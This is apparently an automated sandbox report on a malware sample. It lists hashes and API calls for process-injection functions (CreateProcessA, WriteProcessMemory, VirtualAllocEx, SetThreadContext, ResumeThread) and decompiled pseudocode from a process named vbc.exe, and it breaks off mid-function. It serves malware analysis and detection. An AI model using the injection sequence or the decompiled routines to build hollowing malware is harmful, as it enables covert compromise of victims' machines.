                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0038A3FE
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 2f5c9fa94e0c89145beb83b1179b1be711b03b08898197dc94fc089c0b2ca586
                                • Instruction ID: aaee8f358bea76c6ee5fd18f5c7518f6ecb49fb80d99611a05886b720cb44eb9
                                • Opcode Fuzzy Hash: 2f5c9fa94e0c89145beb83b1179b1be711b03b08898197dc94fc089c0b2ca586
                                • Instruction Fuzzy Hash: 17916B71D007198FEF21DFA9C845BDDBBB2BF48304F1585AAD808A7290DB759981CF92
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0038BA54, Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                Download Yara Rule
                                APIs
                                • GetUserNameA.ADVAPI32(00000000), ref: 0038BBAC
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID: NameUser
                                • String ID:
                                • API String ID: 2645101109-0
                                • Opcode ID: 091181986d0b45d52a09be3cbdf13abb4693c55753d9c379de92e71fa2e72617
                                • Instruction ID: d63eb5744dc79b04e4e6716832a6ccb77e49f1e543ec68ec2b45bb6aecf359d6
                                • Opcode Fuzzy Hash: 091181986d0b45d52a09be3cbdf13abb4693c55753d9c379de92e71fa2e72617
                                • Instruction Fuzzy Hash: 33515270D003098FDB15DFA8C894BEEFBF5AF48304F25816AD816AB294DB749845CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00389E98, Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                Download Yara Rule
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00389F30
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: fe323cb247d3c5192e183963e3c450074ec4185d268a1436a75cafe0d99244ee
                                • Instruction ID: 0f726f30e3833600ebbc979fd8f1f9dc4869ed9e61a42bb924f8e7e458e518b5
                                • Opcode Fuzzy Hash: fe323cb247d3c5192e183963e3c450074ec4185d268a1436a75cafe0d99244ee
                                • Instruction Fuzzy Hash: CA2148759003499FCB10DFA9C884BEEBBF4FF48314F14892AE954A7250D778A955CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00389EA0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00389F30
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: d0baa9bcd20506a31334426bb8e544e909a1e51882898bcb069bd4a69cd294a4
                                • Instruction ID: 8ef377c504264495dc8cfd360fa8593dfe305e2ed8c51c307333ecc2a2509b17
                                • Opcode Fuzzy Hash: d0baa9bcd20506a31334426bb8e544e909a1e51882898bcb069bd4a69cd294a4
                                • Instruction Fuzzy Hash: F52139719003099FCB10CFA9C884BEEBBF5FF48314F54882AE918A7250D778A950CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00389F88, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038A010
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 30952d11f273c612bed3eb9ff27c49a07bd247a37fc101318f8024fb9b6d1a49
                                • Instruction ID: 02b9b2affa0f42adf83bead8afec3b4e56514c1e7163056c9992f745e52f23ea
                                • Opcode Fuzzy Hash: 30952d11f273c612bed3eb9ff27c49a07bd247a37fc101318f8024fb9b6d1a49
                                • Instruction Fuzzy Hash: CC2123B1C007099FCB10CFA9D880BEEBBF5FF88314F14882AE558A7250D7789901CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00389D08, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00389D86
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: fac9f73baa5eb42b15d25ee6f0301bd287fab9361a3ae0975b71b420bd2cc062
                                • Instruction ID: df60cc7de6f826934cb4c3d1c6856b6d4336b097e2474d36a69973a93aa0afab
                                • Opcode Fuzzy Hash: fac9f73baa5eb42b15d25ee6f0301bd287fab9361a3ae0975b71b420bd2cc062
                                • Instruction Fuzzy Hash: 3A2107719003098FDB10DFA9C4847EEBBF8EF88314F54882AD559B7241DB78A945CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00389F90, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038A010
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 6cb8279d618e1fcc366858fbfccb09788fa6c5007eaa40c9fcdfc8d545e39fbe
                                • Instruction ID: 737ee9740e1fe92f2724f59ed093a187265a153caabca2d3d5f9b06550d53f56
                                • Opcode Fuzzy Hash: 6cb8279d618e1fcc366858fbfccb09788fa6c5007eaa40c9fcdfc8d545e39fbe
                                • Instruction Fuzzy Hash: 3D2114B1D007099FDB10CFA9C884BEEBBF4FF48314F50882AE518A7250D778A940CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00389DE0, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00389E4E
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 41595adcc4a702a057b6d32f986d3016843027df320da565eba4d9c65fb5d478
                                • Instruction ID: bcfc23278bd2d58435132cd071f7ef14fb3a5cc6d88bc08aac630b55619b5b2a
                                • Opcode Fuzzy Hash: 41595adcc4a702a057b6d32f986d3016843027df320da565eba4d9c65fb5d478
                                • Instruction Fuzzy Hash: D51137719003089FCB10DFA9D844BEFBBF9EF88314F14881AE529A7250DB75A950CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00389C58, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: eee292947acaa2da56066f4e634c9bc080bb7f1b011208f3bf9744641160344b
                                • Instruction ID: 3f3313556bbc886bdacb4e6905d65772aef513d85e73c4b62d4f9c64b0fe2894
                                • Opcode Fuzzy Hash: eee292947acaa2da56066f4e634c9bc080bb7f1b011208f3bf9744641160344b
                                • Instruction Fuzzy Hash: 8C11F871D007088BDB10DFA9D8447EEFBF8AB88314F14881AD515B7250DB75A944CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0026D1D4, Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248007008.000000000026D000.00000040.00000001.sdmp, Offset: 0026D000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 91cccbcf45b9525104284d3fda98b87436741ffccc4c00b4c297e9b37f470946
                                • Instruction ID: 92eb8afd58d057c6c61950b772e811f3bb55d090935c3cbec257f387cfea7527
                                • Opcode Fuzzy Hash: 91cccbcf45b9525104284d3fda98b87436741ffccc4c00b4c297e9b37f470946
                                • Instruction Fuzzy Hash: 80212570A10348DFDB11CF60D4D0B26BBA5FB84314F24C9ADDC094B242C376D8A6CA61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0026D01C, Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248007008.000000000026D000.00000040.00000001.sdmp, Offset: 0026D000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 740aa0fa49113c4ea6415965727e2ecdda1cdf0221458fc9e5bdf1255b7ac67e
                                • Instruction ID: 53de06f2a338cf19b0043806a883c2c79df3bd4d537f788b52da38504e5404a5
                                • Opcode Fuzzy Hash: 740aa0fa49113c4ea6415965727e2ecdda1cdf0221458fc9e5bdf1255b7ac67e
                                • Instruction Fuzzy Hash: 5821F575B14348DFCB14CF24D484B26BB65EB84314F34C969D84A4B346C37BD8A7CAA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0026D017, Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248007008.000000000026D000.00000040.00000001.sdmp, Offset: 0026D000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9b0ae7669d7f933001f64619446ed9afd0904740971aeb08423ebe050ee2bff0
                                • Instruction ID: 47fccdaf58439ed1e4ee90f07469a0e506ef495009966b83bcc1af4e8c515ab6
                                • Opcode Fuzzy Hash: 9b0ae7669d7f933001f64619446ed9afd0904740971aeb08423ebe050ee2bff0
                                • Instruction Fuzzy Hash: 54118B79A04284DFCB11CF24D584B16BBA1FB84314F24C6AAD8494B656C33AD85BCBA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0026D1CF, Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248007008.000000000026D000.00000040.00000001.sdmp, Offset: 0026D000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9b0ae7669d7f933001f64619446ed9afd0904740971aeb08423ebe050ee2bff0
                                • Instruction ID: a1267c487bfb14409ffab640d9bd0267f834f02e320b5b3619bf418138bec6c0
                                • Opcode Fuzzy Hash: 9b0ae7669d7f933001f64619446ed9afd0904740971aeb08423ebe050ee2bff0
                                • Instruction Fuzzy Hash: 6C11BB75A04284DFDB12CF20D5D4B15BBA1FB84314F28C6AEDC494B656C33AD89ACB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00381DF4, Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: TVJm$TVJm
                                • API String ID: 0-795160959
                                • Opcode ID: e1baada5d62bb26a15f36eb5fb9c3fc3f01e2ebd27c836288d6e19f397f228c5
                                • Instruction ID: 46091b1f446bd1fa52cc0d1a227a250c6b0f0e78f82f467f2b74564015bb1de5
                                • Opcode Fuzzy Hash: e1baada5d62bb26a15f36eb5fb9c3fc3f01e2ebd27c836288d6e19f397f228c5
                                • Instruction Fuzzy Hash: E8B17E70A106289FCB55EFA8C984B9DB7F1FF88304F1185A8E449EB255DB70AD86CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00035A63, Relevance: 2.7, Strings: 1, Instructions: 1485COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2247823084.0000000000032000.00000020.00020000.sdmp, Offset: 00030000, based on PE: true
                                • Associated: 00000004.00000002.2247816875.0000000000030000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.2247925092.00000000000F6000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.2247940228.000000000011C000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 05dfd4986b659c93b4f72665bf30fe1e38125a7e1538d30845f3b92de8e14818
                                • Instruction ID: 48f9f63edd7b91c8c8336c6f1fd60b11075ecba0d80adefd1be30cffd62c798b
                                • Opcode Fuzzy Hash: 05dfd4986b659c93b4f72665bf30fe1e38125a7e1538d30845f3b92de8e14818
                                • Instruction Fuzzy Hash: ECD2671544E3D15FC7238B744CB5A967FB0AE03114B2E4AEFC8C1CA0E3D25D5A9AC762
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00385D60, Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: M$M
                                • API String ID: 0-2122717962
                                • Opcode ID: d58c2fe1aff6022b129372c8f6ab82b0bf74b550e71b4972f28bd3261e8791e3
                                • Instruction ID: 04a3c5abba27ef1c4da1db5a78636cad5a556da98b20e231ace54f96f821dbb0
                                • Opcode Fuzzy Hash: d58c2fe1aff6022b129372c8f6ab82b0bf74b550e71b4972f28bd3261e8791e3
                                • Instruction Fuzzy Hash: 75818272A04B09CFDB25EF88C4487EEF7F5FB84305F2185AAD906AB644C374A949CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00381B82, Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: @2Jm
                                • API String ID: 0-2754219189
                                • Opcode ID: 1f09b582982f4607d280e69a803750e9984969593ee56a3dfaed4396f9953485
                                • Instruction ID: 1f0ddf492a750aba362f2d63c4c9d67cbdf703ee2713ced07d1cf68c7b374ddb
                                • Opcode Fuzzy Hash: 1f09b582982f4607d280e69a803750e9984969593ee56a3dfaed4396f9953485
                                • Instruction Fuzzy Hash: 3E516130A106448FD748EFBAE854699BBE3EBC8304F04C979D505AF378EBB419568F52
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00381B88, Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: @2Jm
                                • API String ID: 0-2754219189
                                • Opcode ID: be2b3cb9c65ecf40f29bd36c08eac588bf2dd52c01aee51c090469aa0cd3ae82
                                • Instruction ID: d15eff0bdb8bf8ad66d8a63a1ebd4c9d9c3efb97ee12fb159822870db15ca116
                                • Opcode Fuzzy Hash: be2b3cb9c65ecf40f29bd36c08eac588bf2dd52c01aee51c090469aa0cd3ae82
                                • Instruction Fuzzy Hash: C85162309106048FD748EFBAE855699BBE3EBC8304F04C979D505AF378EBB419558F52
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00035247, Relevance: .5, Instructions: 491COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2247823084.0000000000032000.00000020.00020000.sdmp, Offset: 00030000, based on PE: true
                                • Associated: 00000004.00000002.2247816875.0000000000030000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.2247925092.00000000000F6000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.2247940228.000000000011C000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6b6f2bed13078fe03851c87093b690b6898d622c2608f8e24b9b16b0fe4a42a
                                • Instruction ID: 3f68b6dec2faf2b375a0219297e1b6b3ba80538272c54da67a92db68a7c8e94c
                                • Opcode Fuzzy Hash: d6b6f2bed13078fe03851c87093b690b6898d622c2608f8e24b9b16b0fe4a42a
                                • Instruction Fuzzy Hash: 1312FE6244E7C29FC7038B704CB5591BFB0AE53214B1E8ADBC8C18F4A3E25D695AD763
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 003872C0, Relevance: .3, Instructions: 281COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b68eb5a121f7aa3c1478cc618c952de6784896357288a3cdab98232a0e59e7b8
                                • Instruction ID: 857164b6a45c6536ea1f793c71da49ef2bdfb41446f75a7393f636548c7c7212
                                • Opcode Fuzzy Hash: b68eb5a121f7aa3c1478cc618c952de6784896357288a3cdab98232a0e59e7b8
                                • Instruction Fuzzy Hash: B8A1D431A1C3448FCB16EB68C8447AABBF6EB49300F2988EBD4469B742D734D945CB56
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00385D70, Relevance: .2, Instructions: 214COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9c08d18baf57aad32abbce39eb43c3ecc0a8871f70cf2001919f7f49cb51acde
                                • Instruction ID: 6dec2255ed4f67aeddf59d06bff6083333933718a4e05ad5ee3cf9737091a62a
                                • Opcode Fuzzy Hash: 9c08d18baf57aad32abbce39eb43c3ecc0a8871f70cf2001919f7f49cb51acde
                                • Instruction Fuzzy Hash: 5881B571A04B09CFDB25EF88C8487EEB7F5FB84301F1185BAD906ABA44C374A949CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 003872B2, Relevance: .2, Instructions: 209COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2248038348.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7b212babebcf4d201dbacfe294a414a51e031c7d1951beaa5e0ad182686d084c
                                • Instruction ID: 487af918dea64ed989b86701bd7616449f93ad085b09d91294692bc4a3545521
                                • Opcode Fuzzy Hash: 7b212babebcf4d201dbacfe294a414a51e031c7d1951beaa5e0ad182686d084c
                                • Instruction Fuzzy Hash: B7819531A18304CBDF15DB98C8447AEB7F6FB88304F2989ABE416AB745C334E945CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: vbc.exe PID: 2948 Parent PID: 2924 vbc.exeCOMMON

                                Executed Functions

                                Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 23%
                                			E00419E0A(void* __eax, void* __edx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t22;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t36;

				asm("lodsd");
				 *(__edx - 0x1374aa1b) =  *(__edx - 0x1374aa1b) << 1;
				_t17 = _a4;
				_t34 = _a4 + 0xc48;
				E0041A960(_t32, _a4, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
				_t8 =  &_a32; // 0x414d42
				_t14 =  &_a8; // 0x414d42
				_t22 =  *((intOrPtr*)( *_t34))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, _t33, _t36); // executed
				return _t22;
			}








                                0x00419e0a
                                0x00419e0d
                                0x00419e13
                                0x00419e1f
                                0x00419e27
                                0x00419e32
                                0x00419e4d
                                0x00419e55
                                0x00419e59

                                APIs
                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: FileRead
                                • String ID: BMA$BMA
                                • API String ID: 2738559852-2163208940
                                • Opcode ID: 9c31f9a2a6d1122978f813f0980ad753c70029bfa9984399f8d8b62fca1145a2
                                • Instruction ID: e89e7652abac12720f5c67d4a4b87e447dd03c11e3e09fd1d5116b5a5f332e44
                                • Opcode Fuzzy Hash: 9c31f9a2a6d1122978f813f0980ad753c70029bfa9984399f8d8b62fca1145a2
                                • Instruction Fuzzy Hash: 5BF0F4B2200108AFDB14DF99CC84EEB77A9EF8C754F158649FA1DA7241CA30E951CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                0x00419e13
                                0x00419e1f
                                0x00419e27
                                0x00419e32
                                0x00419e4d
                                0x00419e55
                                0x00419e59

                                APIs
                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: FileRead
                                • String ID: BMA$BMA
                                • API String ID: 2738559852-2163208940
                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E0040ACD0(void* __eflags, void* _a4, signed int _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_push(_v8);
					_t17 = E0041CA70(_t24, __eflags);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                0x0040acd9
                                0x0040acec
                                0x0040acef
                                0x0040acf4
                                0x0040acf9
                                0x0040ad02
                                0x0040ad03
                                0x0040ad08
                                0x0040ad0b
                                0x0040ad0d
                                0x0040ad15
                                0x0040ad1a
                                0x0040ad1a
                                0x0040ad21
                                0x0040ad29
                                0x0040ad2c
                                0x0040ad2e
                                0x0040ad42
                                0x00000000
                                0x0040ad44
                                0x0040ad4a
                                0x0040acfe
                                0x0040acfe
                                0x0040acfe

                                APIs
                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Load
                                • String ID:
                                • API String ID: 2234796835-0
                                • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                0x00419d6f
                                0x00419d77
                                0x00419dad
                                0x00419db1

                                APIs
                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                0x00419f4f
                                0x00419f57
                                0x00419f79
                                0x00419f7d

                                APIs
                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryVirtual
                                • String ID:
                                • API String ID: 2167126740-0
                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419E8F, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00419E8F(void* __edx, intOrPtr _a4, void* _a8) {
				void* _v117;
				long _t9;
				void* _t14;

				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x40a923
				E0041A960(_t14, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}






                                0x00419e93
                                0x00419e96
                                0x00419e9f
